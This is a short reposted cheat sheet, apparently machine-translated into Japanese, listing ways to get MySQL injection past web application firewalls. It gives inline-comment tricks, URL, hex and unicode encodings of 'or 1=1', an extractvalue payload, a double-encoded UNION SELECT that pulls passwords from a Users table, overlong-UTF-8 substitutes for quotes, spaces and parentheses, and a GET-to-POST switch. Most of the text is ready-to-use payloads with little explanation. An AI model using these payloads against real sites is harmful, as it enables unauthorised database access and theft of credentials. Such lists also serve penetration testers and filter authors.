Mysql注入迂回姿勢

891 ワード

1.インラインバイパス
2.URLEncode符号化、ASCII、HEX、unicode符号化などの符号化バイパス
or 1=1 %6f%72%20%31%3d%31, Test CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

 

SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))

 

?id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

 unicode :  
 :'
%u0027 %u02b9 %u02bc
%u02c8 %u2032
%uff07 %c0%27
%c0%a7 %e0%80%a7
 :
%u0020 %uff00
%c0%20 %c0%a0 %e0%80%a0
 (:
%u0028 %uff08
%c0%28 %c0%a8
%e0%80%a8
 ):
%u0029 %uff09
%c0%29 %c0%a9
%e0%80%a9

  
3.提出方式は迂回し、GETのみをフィルタリングしてPOSTをフィルタリングしていないものもある
4.括弧はスペースを迂回する:http://www.lijiejie.com/mysql-injection-bypass-waf-2/
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
参考記事:http://www.cnblogs.com/joy-nick/p/5774462.html
転載先:https://www.cnblogs.com/xishaonian/p/6102556.html